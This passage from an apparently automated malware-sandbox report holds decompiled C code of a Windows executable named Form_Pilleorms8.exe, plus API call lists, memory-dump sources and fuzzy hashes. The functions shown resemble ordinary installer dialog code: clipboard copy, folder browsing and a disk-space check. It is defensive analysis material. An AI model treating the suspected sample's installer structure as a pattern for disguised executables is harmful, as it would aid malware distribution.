                        • Associated: 00000000.00000002.672641565.0000000000400000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672652442.0000000000408000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672656687.000000000040A000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672661358.000000000040D000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672665051.0000000000414000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672669296.000000000041A000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672673110.000000000041E000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672676576.0000000000425000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672681388.0000000000431000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672686997.0000000000440000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672691764.000000000044C000.00000002.00020000.sdmp Download File
                        Similarity
                        • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
                        • String ID:
                        • API String ID: 2972824698-0
                        • Opcode ID: e5695736b62b43c8ae89a662f08ea5f60bb9f5769fc6117d503f1a8a6a447ea4
                        • Instruction ID: a015d294fcb9cc4e365613bb9e09bf6e78b00889af70ee47f703a6c6056ea9c8
                        • Opcode Fuzzy Hash: e5695736b62b43c8ae89a662f08ea5f60bb9f5769fc6117d503f1a8a6a447ea4
                        • Instruction Fuzzy Hash: 2DF09072904112EBCB21BBA59A84EDE76E8DF01318F25403BE102B21D1D77C4E429A6E
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E00403B12() {
                        				void* _t1;
                        				signed int _t6;
                        
                        				_t1 =  *0x40a018; // 0xffffffff
                        				if(_t1 != 0xffffffff) {
                        					CloseHandle(_t1);
                        					 *0x40a018 =  *0x40a018 | 0xffffffff;
                        					_t6 =  *0x40a018;
                        				}
                        				E00403B57();
                        				return E00405C49(_t6, 0x443000, 7);
                        			}





                        0x00403b12
                        0x00403b1a
                        0x00403b1d
                        0x00403b23
                        0x00403b23
                        0x00403b23
                        0x00403b2a
                        0x00403b3b

                        APIs
                        • CloseHandle.KERNEL32(FFFFFFFF,00403A5E,?), ref: 00403B1D
                        Memory Dump Source
                        • Source File: 00000000.00000002.672645823.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.672641565.0000000000400000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672652442.0000000000408000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672656687.000000000040A000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672661358.000000000040D000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672665051.0000000000414000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672669296.000000000041A000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672673110.000000000041E000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672676576.0000000000425000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672681388.0000000000431000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672686997.0000000000440000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672691764.000000000044C000.00000002.00020000.sdmp Download File
                        Similarity
                        • API ID: CloseHandle
                        • String ID:
                        • API String ID: 2962429428-0
                        • Opcode ID: 9cd88207fd683789c603ed0f4e7699fa10f469d988cc37cfea850538d3727966
                        • Instruction ID: 74b342ff74dc5917d60848dc34610585f5de2c5243f802b65b47dd8438b48b4d
                        • Opcode Fuzzy Hash: 9cd88207fd683789c603ed0f4e7699fa10f469d988cc37cfea850538d3727966
                        • Instruction Fuzzy Hash: 5EC0123050470056D1646F749E4FE153B64AB4073EB600325B0F9B10F1CB3C5759895D
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Non-executed Functions

                        C-Code - Quality: 95%
                        			E004056DE(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
                        				struct HWND__* _v8;
                        				long _v12;
                        				struct tagRECT _v28;
                        				void* _v36;
                        				signed int _v40;
                        				int _v44;
                        				int _v48;
                        				signed int _v52;
                        				int _v56;
                        				void* _v60;
                        				void* _v68;
                        				void* __ebx;
                        				void* __edi;
                        				void* __esi;
                        				struct HWND__* _t94;
                        				long _t95;
                        				int _t100;
                        				void* _t108;
                        				intOrPtr _t130;
                        				struct HWND__* _t134;
                        				int _t156;
                        				int _t159;
                        				struct HMENU__* _t164;
                        				struct HWND__* _t168;
                        				struct HWND__* _t169;
                        				int _t171;
                        				void* _t172;
                        				short* _t173;
                        				short* _t175;
                        				int _t177;
                        
                        				_t169 =  *0x433ee4;
                        				_t156 = 0;
                        				_v8 = _t169;
                        				if(_a8 != 0x110) {
                        					if(_a8 == 0x405) {
                        						CloseHandle(CreateThread(0, 0, E00405672, GetDlgItem(_a4, 0x3ec), 0,  &_v12));
                        					}
                        					if(_a8 != 0x111) {
                        						L17:
                        						_t171 = 1;
                        						if(_a8 != 0x404) {
                        							L25:
                        							if(_a8 != 0x7b) {
                        								goto L20;
                        							}
                        							_t94 = _v8;
                        							if(_a12 != _t94) {
                        								goto L20;
                        							}
                        							_t95 = SendMessageW(_t94, 0x1004, _t156, _t156);
                        							_a8 = _t95;
                        							if(_t95 <= _t156) {
                        								L36:
                        								return 0;
                        							}
                        							_t164 = CreatePopupMenu();
                        							AppendMenuW(_t164, _t156, _t171, E0040657A(_t156, _t164, _t171, _t156, 0xffffffe1));
                        							_t100 = _a16;
                        							_t159 = _a16 >> 0x10;
                        							if(_a16 == 0xffffffff) {
                        								GetWindowRect(_v8,  &_v28);
                        								_t100 = _v28.left;
                        								_t159 = _v28.top;
                        							}
                        							if(TrackPopupMenu(_t164, 0x180, _t100, _t159, _t156, _a4, _t156) == _t171) {
                        								_v60 = _t156;
                        								_v48 = 0x42d268;
                        								_v44 = 0x1000;
                        								_a4 = _a8;
                        								do {
                        									_a4 = _a4 - 1;
                        									_t171 = _t171 + SendMessageW(_v8, 0x1073, _a4,  &_v68) + 2;
                        								} while (_a4 != _t156);
                        								OpenClipboard(_t156);
                        								EmptyClipboard();
                        								_t108 = GlobalAlloc(0x42, _t171 + _t171);
                        								_a4 = _t108;
                        								_t172 = GlobalLock(_t108);
                        								do {
                        									_v48 = _t172;
                        									_t173 = _t172 + SendMessageW(_v8, 0x1073, _t156,  &_v68) * 2;
                        									 *_t173 = 0xd;
                        									_t175 = _t173 + 2;
                        									 *_t175 = 0xa;
                        									_t172 = _t175 + 2;
                        									_t156 = _t156 + 1;
                        								} while (_t156 < _a8);
                        								GlobalUnlock(_a4);
                        								SetClipboardData(0xd, _a4);
                        								CloseClipboard();
                        							}
                        							goto L36;
                        						}
                        						if( *0x433ecc == _t156) {
                        							ShowWindow( *0x434f08, 8);
                        							if( *0x434f8c == _t156) {
                        								E0040559F( *((intOrPtr*)( *0x42c240 + 0x34)), _t156);
                        							}
                        							E00404472(_t171);
                        							goto L25;
                        						}
                        						 *0x42ba38 = 2;
                        						E00404472(0x78);
                        						goto L20;
                        					} else {
                        						if(_a12 != 0x403) {
                        							L20:
                        							return E00404500(_a8, _a12, _a16);
                        						}
                        						ShowWindow( *0x433ed0, _t156);
                        						ShowWindow(_t169, 8);
                        						E004044CE(_t169);
                        						goto L17;
                        					}
                        				}
                        				_v52 = _v52 | 0xffffffff;
                        				_v40 = _v40 | 0xffffffff;
                        				_t177 = 2;
                        				_v60 = _t177;
                        				_v56 = 0;
                        				_v48 = 0;
                        				_v44 = 0;
                        				asm("stosd");
                        				asm("stosd");
                        				_t130 =  *0x434f10;
                        				_a8 =  *((intOrPtr*)(_t130 + 0x5c));
                        				_a12 =  *((intOrPtr*)(_t130 + 0x60));
                        				 *0x433ed0 = GetDlgItem(_a4, 0x403);
                        				 *0x433ec8 = GetDlgItem(_a4, 0x3ee);
                        				_t134 = GetDlgItem(_a4, 0x3f8);
                        				 *0x433ee4 = _t134;
                        				_v8 = _t134;
                        				E004044CE( *0x433ed0);
                        				 *0x433ed4 = E00404E27(4);
                        				 *0x433eec = 0;
                        				GetClientRect(_v8,  &_v28);
                        				_v52 = _v28.right - GetSystemMetrics(_t177);
                        				SendMessageW(_v8, 0x1061, 0,  &_v60);
                        				SendMessageW(_v8, 0x1036, 0x4000, 0x4000);
                        				if(_a8 >= 0) {
                        					SendMessageW(_v8, 0x1001, 0, _a8);
                        					SendMessageW(_v8, 0x1026, 0, _a8);
                        				}
                        				if(_a12 >= _t156) {
                        					SendMessageW(_v8, 0x1024, _t156, _a12);
                        				}
                        				_push( *((intOrPtr*)(_a16 + 0x30)));
                        				_push(0x1b);
                        				E00404499(_a4);
                        				if(( *0x434f18 & 0x00000003) != 0) {
                        					ShowWindow( *0x433ed0, _t156);
                        					if(( *0x434f18 & 0x00000002) != 0) {
                        						 *0x433ed0 = _t156;
                        					} else {
                        						ShowWindow(_v8, 8);
                        					}
                        					E004044CE( *0x433ec8);
                        				}
                        				_t168 = GetDlgItem(_a4, 0x3ec);
                        				SendMessageW(_t168, 0x401, _t156, 0x75300000);
                        				if(( *0x434f18 & 0x00000004) != 0) {
                        					SendMessageW(_t168, 0x409, _t156, _a12);
                        					SendMessageW(_t168, 0x2001, _t156, _a8);
                        				}
                        				goto L36;
                        			}

































                        0x004056e6
                        0x004056ec
                        0x004056f6
                        0x004056f9
                        0x0040588f
                        0x004058b3
                        0x004058b3
                        0x004058c6
                        0x004058e4
                        0x004058e6
                        0x004058ee
                        0x00405944
                        0x00405948
                        0x00000000
                        0x00000000
                        0x0040594a
                        0x00405950
                        0x00000000
                        0x00000000
                        0x0040595a
                        0x00405962
                        0x00405965
                        0x00405a67
                        0x00000000
                        0x00405a67
                        0x00405974
                        0x0040597f
                        0x00405988
                        0x00405993
                        0x00405996
                        0x0040599f
                        0x004059a5
                        0x004059a8
                        0x004059a8
                        0x004059c0
                        0x004059c9
                        0x004059cc
                        0x004059d3
                        0x004059da
                        0x004059e2
                        0x004059e2
                        0x004059f9
                        0x004059f9
                        0x00405a00
                        0x00405a06
                        0x00405a12
                        0x00405a19
                        0x00405a22
                        0x00405a24
                        0x00405a27
                        0x00405a36
                        0x00405a39
                        0x00405a3f
                        0x00405a40
                        0x00405a46
                        0x00405a47
                        0x00405a48
                        0x00405a50
                        0x00405a5b
                        0x00405a61
                        0x00405a61
                        0x00000000
                        0x004059c0
                        0x004058f6
                        0x00405926
                        0x0040592e
                        0x00405939
                        0x00405939
                        0x0040593f
                        0x00000000
                        0x0040593f
                        0x004058fa
                        0x00405904
                        0x00000000
                        0x004058c8
                        0x004058ce
                        0x00405909
                        0x00000000
                        0x00405912
                        0x004058d7
                        0x004058dc
                        0x004058df
                        0x00000000
                        0x004058df
                        0x004058c6
                        0x004056ff
                        0x00405703
                        0x0040570b
                        0x0040570f
                        0x00405712
                        0x00405715
                        0x00405718
                        0x0040571b
                        0x0040571c
                        0x0040571d
                        0x00405736
                        0x00405739
                        0x00405743
                        0x00405752
                        0x0040575a
                        0x00405762
                        0x00405767
                        0x0040576a
                        0x00405776
                        0x0040577f
                        0x00405788
                        0x004057aa
                        0x004057b0
                        0x004057c1
                        0x004057c6
                        0x004057d4
                        0x004057e2
                        0x004057e2
                        0x004057e7
                        0x004057f5
                        0x004057f5
                        0x004057fa
                        0x004057fd
                        0x00405802
                        0x0040580e
                        0x00405817
                        0x00405824
                        0x00405833
                        0x00405826
                        0x0040582b
                        0x0040582b
                        0x0040583f
                        0x0040583f
                        0x00405853
                        0x0040585c
                        0x00405865
                        0x00405875
                        0x00405881
                        0x00405881
                        0x00000000

                        APIs
                        • GetDlgItem.USER32 ref: 0040573C
                        • GetDlgItem.USER32 ref: 0040574B
                        • GetClientRect.USER32 ref: 00405788
                        • GetSystemMetrics.USER32 ref: 0040578F
                        • SendMessageW.USER32(?,00001061,00000000,?), ref: 004057B0
                        • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004057C1
                        • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004057D4
                        • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004057E2
                        • SendMessageW.USER32(?,00001024,00000000,?), ref: 004057F5
                        • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405817
                        • ShowWindow.USER32(?,00000008), ref: 0040582B
                        • GetDlgItem.USER32 ref: 0040584C
                        • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040585C
                        • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405875
                        • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405881
                        • GetDlgItem.USER32 ref: 0040575A
                          • Part of subcall function 004044CE: SendMessageW.USER32(00000028,?,00000001,004042F9), ref: 004044DC
                        • GetDlgItem.USER32 ref: 0040589E
                        • CreateThread.KERNEL32(00000000,00000000,Function_00005672,00000000), ref: 004058AC
                        • CloseHandle.KERNEL32(00000000), ref: 004058B3
                        • ShowWindow.USER32(00000000), ref: 004058D7
                        • ShowWindow.USER32(?,00000008), ref: 004058DC
                        • ShowWindow.USER32(00000008), ref: 00405926
                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040595A
                        • CreatePopupMenu.USER32 ref: 0040596B
                        • AppendMenuW.USER32 ref: 0040597F
                        • GetWindowRect.USER32 ref: 0040599F
                        • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004059B8
                        • SendMessageW.USER32(?,00001073,00000000,?), ref: 004059F0
                        • OpenClipboard.USER32(00000000), ref: 00405A00
                        • EmptyClipboard.USER32 ref: 00405A06
                        • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405A12
                        • GlobalLock.KERNEL32 ref: 00405A1C
                        • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405A30
                        • GlobalUnlock.KERNEL32(00000000), ref: 00405A50
                        • SetClipboardData.USER32(0000000D,00000000), ref: 00405A5B
                        • CloseClipboard.USER32 ref: 00405A61
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.672645823.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.672641565.0000000000400000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672652442.0000000000408000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672656687.000000000040A000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672661358.000000000040D000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672665051.0000000000414000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672669296.000000000041A000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672673110.000000000041E000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672676576.0000000000425000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672681388.0000000000431000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672686997.0000000000440000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672691764.000000000044C000.00000002.00020000.sdmp Download File
                        Similarity
                        • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                        • String ID: {
                        • API String ID: 590372296-366298937
                        • Opcode ID: efbbf4d88f7660e4c87201c03f03245d3270aa31951a4a241d93bb0c475bbbe6
                        • Instruction ID: 6b97441d6f4cfe62a880681573964a63c423f2dd70b2063085686802d9cc5617
                        • Opcode Fuzzy Hash: efbbf4d88f7660e4c87201c03f03245d3270aa31951a4a241d93bb0c475bbbe6
                        • Instruction Fuzzy Hash: C8B169B1900608FFDB119FA0DD85AAE7B79FB44355F00803AFA41BA1A0C7755E51DF58
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 78%
                        			E0040498A(unsigned int __edx, struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
                        				signed int _v8;
                        				signed int _v12;
                        				long _v16;
                        				long _v20;
                        				long _v24;
                        				char _v28;
                        				intOrPtr _v32;
                        				long _v36;
                        				char _v40;
                        				unsigned int _v44;
                        				signed int _v48;
                        				WCHAR* _v56;
                        				intOrPtr _v60;
                        				intOrPtr _v64;
                        				intOrPtr _v68;
                        				WCHAR* _v72;
                        				void _v76;
                        				struct HWND__* _v80;
                        				void* __ebx;
                        				void* __edi;
                        				void* __esi;
                        				intOrPtr _t82;
                        				long _t87;
                        				short* _t89;
                        				void* _t95;
                        				signed int _t96;
                        				int _t109;
                        				signed short _t114;
                        				signed int _t118;
                        				struct HWND__** _t122;
                        				intOrPtr* _t138;
                        				WCHAR* _t146;
                        				unsigned int _t150;
                        				signed int _t152;
                        				unsigned int _t156;
                        				signed int _t158;
                        				signed int* _t159;
                        				signed int* _t160;
                        				struct HWND__* _t166;
                        				struct HWND__* _t167;
                        				int _t169;
                        				unsigned int _t197;
                        
                        				_t156 = __edx;
                        				_t82 =  *0x42c240;
                        				_v32 = _t82;
                        				_t146 = ( *(_t82 + 0x3c) << 0xb) + 0x436000;
                        				_v12 =  *((intOrPtr*)(_t82 + 0x38));
                        				if(_a8 == 0x40b) {
                        					E00405B81(0x3fb, _t146);
                        					E004067C4(_t146);
                        				}
                        				_t167 = _a4;
                        				if(_a8 != 0x110) {
                        					L8:
                        					if(_a8 != 0x111) {
                        						L20:
                        						if(_a8 == 0x40f) {
                        							L22:
                        							_v8 = _v8 & 0x00000000;
                        							_v12 = _v12 & 0x00000000;
                        							E00405B81(0x3fb, _t146);
                        							if(E00405F14(_t186, _t146) == 0) {
                        								_v8 = 1;
                        							}
                        							E0040653D(0x42b238, _t146);
                        							_t87 = E0040690A(1);
                        							_v16 = _t87;
                        							if(_t87 == 0) {
                        								L30:
                        								E0040653D(0x42b238, _t146);
                        								_t89 = E00405EB7(0x42b238);
                        								_t158 = 0;
                        								if(_t89 != 0) {
                        									 *_t89 = 0;
                        								}
                        								if(GetDiskFreeSpaceW(0x42b238,  &_v20,  &_v24,  &_v16,  &_v36) == 0) {
                        									goto L35;
                        								} else {
                        									_t169 = 0x400;
                        									_t109 = MulDiv(_v20 * _v24, _v16, 0x400);
                        									asm("cdq");
                        									_v48 = _t109;
                        									_v44 = _t156;
                        									_v12 = 1;
                        									goto L36;
                        								}
                        							} else {
                        								_t159 = 0;
                        								if(0 == 0x42b238) {
                        									goto L30;
                        								} else {
                        									goto L26;
                        								}
                        								while(1) {
                        									L26:
                        									_t114 = _v16(0x42b238,  &_v48,  &_v28,  &_v40);
                        									if(_t114 != 0) {
                        										break;
                        									}
                        									if(_t159 != 0) {
                        										 *_t159 =  *_t159 & _t114;
                        									}
                        									_t160 = E00405E58(0x42b238);
                        									 *_t160 =  *_t160 & 0x00000000;
                        									_t159 = _t160;
                        									 *_t159 = 0x5c;
                        									if(_t159 != 0x42b238) {
                        										continue;
                        									} else {
                        										goto L30;
                        									}
                        								}
                        								_t150 = _v44;
                        								_v48 = (_t150 << 0x00000020 | _v48) >> 0xa;
                        								_v44 = _t150 >> 0xa;
                        								_v12 = 1;
                        								_t158 = 0;
                        								__eflags = 0;
                        								L35:
                        								_t169 = 0x400;
                        								L36:
                        								_t95 = E00404E27(5);
                        								if(_v12 != _t158) {
                        									_t197 = _v44;
                        									if(_t197 <= 0 && (_t197 < 0 || _v48 < _t95)) {
                        										_v8 = 2;
                        									}
                        								}
                        								if( *((intOrPtr*)( *0x433edc + 0x10)) != _t158) {
                        									E00404E0F(0x3ff, 0xfffffffb, _t95);
                        									if(_v12 == _t158) {
                        										SetDlgItemTextW(_a4, _t169, 0x42b228);
                        									} else {
                        										E00404D46(_t169, 0xfffffffc, _v48, _v44);
                        									}
                        								}
                        								_t96 = _v8;
                        								 *0x434fa4 = _t96;
                        								if(_t96 == _t158) {
                        									_v8 = E0040140B(7);
                        								}
                        								if(( *(_v32 + 0x14) & _t169) != 0) {
                        									_v8 = _t158;
                        								}
                        								E004044BB(0 | _v8 == _t158);
                        								if(_v8 == _t158 &&  *0x42d258 == _t158) {
                        									E004048E3();
                        								}
                        								 *0x42d258 = _t158;
                        								goto L53;
                        							}
                        						}
                        						_t186 = _a8 - 0x405;
                        						if(_a8 != 0x405) {
                        							goto L53;
                        						}
                        						goto L22;
                        					}
                        					_t118 = _a12 & 0x0000ffff;
                        					if(_t118 != 0x3fb) {
                        						L12:
                        						if(_t118 == 0x3e9) {
                        							_t152 = 7;
                        							memset( &_v76, 0, _t152 << 2);
                        							_v80 = _t167;
                        							_v72 = 0x42d268;
                        							_v60 = E00404CE0;
                        							_v56 = _t146;
                        							_v68 = E0040657A(_t146, 0x42d268, _t167, 0x42ba40, _v12);
                        							_t122 =  &_v80;
                        							_v64 = 0x41;
                        							__imp__SHBrowseForFolderW(_t122);
                        							if(_t122 == 0) {
                        								_a8 = 0x40f;
                        							} else {
                        								__imp__CoTaskMemFree(_t122);
                        								E00405E0C(_t146);
                        								_t125 =  *((intOrPtr*)( *0x434f10 + 0x11c));
                        								if( *((intOrPtr*)( *0x434f10 + 0x11c)) != 0 && _t146 == L"C:\\Users\\jones\\AppData\\Local\\Temp") {
                        									E0040657A(_t146, 0x42d268, _t167, 0, _t125);
                        									if(lstrcmpiW(0x432ea0, 0x42d268) != 0) {
                        										lstrcatW(_t146, 0x432ea0);
                        									}
                        								}
                        								 *0x42d258 =  *0x42d258 + 1;
                        								SetDlgItemTextW(_t167, 0x3fb, _t146);
                        							}
                        						}
                        						goto L20;
                        					}
                        					if(_a12 >> 0x10 != 0x300) {
                        						goto L53;
                        					}
                        					_a8 = 0x40f;
                        					goto L12;
                        				} else {
                        					_t166 = GetDlgItem(_t167, 0x3fb);
                        					if(E00405E83(_t146) != 0 && E00405EB7(_t146) == 0) {
                        						E00405E0C(_t146);
                        					}
                        					 *0x433ed8 = _t167;
                        					SetWindowTextW(_t166, _t146);
                        					_push( *((intOrPtr*)(_a16 + 0x34)));
                        					_push(1);
                        					E00404499(_t167);
                        					_push( *((intOrPtr*)(_a16 + 0x30)));
                        					_push(0x14);
                        					E00404499(_t167);
                        					E004044CE(_t166);
                        					_t138 = E0040690A(8);
                        					if(_t138 == 0) {
                        						L53:
                        						return E00404500(_a8, _a12, _a16);
                        					} else {
                        						 *_t138(_t166, 1);
                        						goto L8;
                        					}
                        				}
                        			}













































                        0x0040498a
                        0x00404990
                        0x00404996
                        0x004049a3
                        0x004049b1
                        0x004049b4
                        0x004049bc
                        0x004049c2
                        0x004049c2
                        0x004049ce
                        0x004049d1
                        0x00404a3f
                        0x00404a46
                        0x00404b1d
                        0x00404b24
                        0x00404b33
                        0x00404b33
                        0x00404b37
                        0x00404b41
                        0x00404b4e
                        0x00404b50
                        0x00404b50
                        0x00404b5e
                        0x00404b65
                        0x00404b6c
                        0x00404b6f
                        0x00404bab
                        0x00404bad
                        0x00404bb3
                        0x00404bb8
                        0x00404bbc
                        0x00404bbe
                        0x00404bbe
                        0x00404bda
                        0x00000000
                        0x00404bdc
                        0x00404bdf
                        0x00404bed
                        0x00404bf3
                        0x00404bf4
                        0x00404bf7
                        0x00404bfa
                        0x00000000
                        0x00404bfa
                        0x00404b71
                        0x00404b73
                        0x00404b77
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00404b79
                        0x00404b79
                        0x00404b86
                        0x00404b8b
                        0x00000000
                        0x00000000
                        0x00404b8f
                        0x00404b91
                        0x00404b91
                        0x00404b9a
                        0x00404b9c
                        0x00404ba1
                        0x00404ba4
                        0x00404ba9
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00404ba9
                        0x00404c06
                        0x00404c10
                        0x00404c13
                        0x00404c16
                        0x00404c1d
                        0x00404c1d
                        0x00404c1f
                        0x00404c1f
                        0x00404c24
                        0x00404c26
                        0x00404c2e
                        0x00404c35
                        0x00404c37
                        0x00404c42
                        0x00404c42
                        0x00404c37
                        0x00404c52
                        0x00404c5c
                        0x00404c64
                        0x00404c7f
                        0x00404c66
                        0x00404c6f
                        0x00404c6f
                        0x00404c64
                        0x00404c84
                        0x00404c89
                        0x00404c8e
                        0x00404c97
                        0x00404c97
                        0x00404ca0
                        0x00404ca2
                        0x00404ca2
                        0x00404cae
                        0x00404cb6
                        0x00404cc0
                        0x00404cc0
                        0x00404cc5
                        0x00000000
                        0x00404cc5
                        0x00404b6f
                        0x00404b26
                        0x00404b2d
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00404b2d
                        0x00404a4c
                        0x00404a55
                        0x00404a6f
                        0x00404a74
                        0x00404a7e
                        0x00404a85
                        0x00404a91
                        0x00404a94
                        0x00404a97
                        0x00404a9e
                        0x00404aa6
                        0x00404aa9
                        0x00404aad
                        0x00404ab4
                        0x00404abc
                        0x00404b16
                        0x00404abe
                        0x00404abf
                        0x00404ac6
                        0x00404ad0
                        0x00404ad8
                        0x00404ae5
                        0x00404af9
                        0x00404afd
                        0x00404afd
                        0x00404af9
                        0x00404b02
                        0x00404b0f
                        0x00404b0f
                        0x00404abc
                        0x00000000
                        0x00404a74
                        0x00404a62
                        0x00000000
                        0x00000000
                        0x00404a68
                        0x00000000
                        0x004049d3
                        0x004049e0
                        0x004049e9
                        0x004049f6
                        0x004049f6
                        0x004049fd
                        0x00404a03
                        0x00404a0c
                        0x00404a0f
                        0x00404a12
                        0x00404a1a
                        0x00404a1d
                        0x00404a20
                        0x00404a26
                        0x00404a2d
                        0x00404a34
                        0x00404ccb
                        0x00404cdd
                        0x00404a3a
                        0x00404a3d
                        0x00000000
                        0x00404a3d
                        0x00404a34

                        APIs
                        • GetDlgItem.USER32 ref: 004049D9
                        • SetWindowTextW.USER32(00000000,?), ref: 00404A03
                        • SHBrowseForFolderW.SHELL32(?), ref: 00404AB4
                        • CoTaskMemFree.OLE32(00000000), ref: 00404ABF
                        • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exe,0042D268,00000000,?,?), ref: 00404AF1
                        • lstrcatW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exe), ref: 00404AFD
                        • SetDlgItemTextW.USER32 ref: 00404B0F
                          • Part of subcall function 00405B81: GetDlgItemTextW.USER32 ref: 00405B94
                          • Part of subcall function 004067C4: CharNextW.USER32(?,*?|<>/":,00000000,00000000,73BCFAA0,C:\Users\user\AppData\Local\Temp\,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00406827
                          • Part of subcall function 004067C4: CharNextW.USER32(?,?,?,00000000,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00406836
                          • Part of subcall function 004067C4: CharNextW.USER32(?,00000000,73BCFAA0,C:\Users\user\AppData\Local\Temp\,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 0040683B
                          • Part of subcall function 004067C4: CharPrevW.USER32(?,?,73BCFAA0,C:\Users\user\AppData\Local\Temp\,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 0040684E
                        • GetDiskFreeSpaceW.KERNEL32(0042B238,?,?,0000040F,?,0042B238,0042B238,?,00000001,0042B238,?,?,000003FB,?), ref: 00404BD2
                        • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404BED
                          • Part of subcall function 00404D46: lstrlenW.KERNEL32(0042D268,0042D268,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404DE7
                          • Part of subcall function 00404D46: wsprintfW.USER32 ref: 00404DF0
                          • Part of subcall function 00404D46: SetDlgItemTextW.USER32 ref: 00404E03
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.672645823.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.672641565.0000000000400000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672652442.0000000000408000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672656687.000000000040A000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672661358.000000000040D000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672665051.0000000000414000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672669296.000000000041A000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672673110.000000000041E000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672676576.0000000000425000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672681388.0000000000431000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672686997.0000000000440000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672691764.000000000044C000.00000002.00020000.sdmp Download File
                        Similarity
                        • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                        • String ID: A$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exe
                        • API String ID: 2624150263-3879798772
                        • Opcode ID: 259166ff03eae0857acd79a20f7b98923a8009c2c5ceed70d4eafac61dfc2b3f
                        • Instruction ID: a81e8b8b6ddc8ea4f7a7a45a10ce21cc850824e22f7b82fba9ad49fead82d7d1
                        • Opcode Fuzzy Hash: 259166ff03eae0857acd79a20f7b98923a8009c2c5ceed70d4eafac61dfc2b3f
                        • Instruction Fuzzy Hash: CBA191B1900208ABDB119FA6DD45AAFB7B8EF84314F10803BF601B62D1D77C9A41CB6D
                        Uniqueness

                        Uniqueness Score: -1.00%

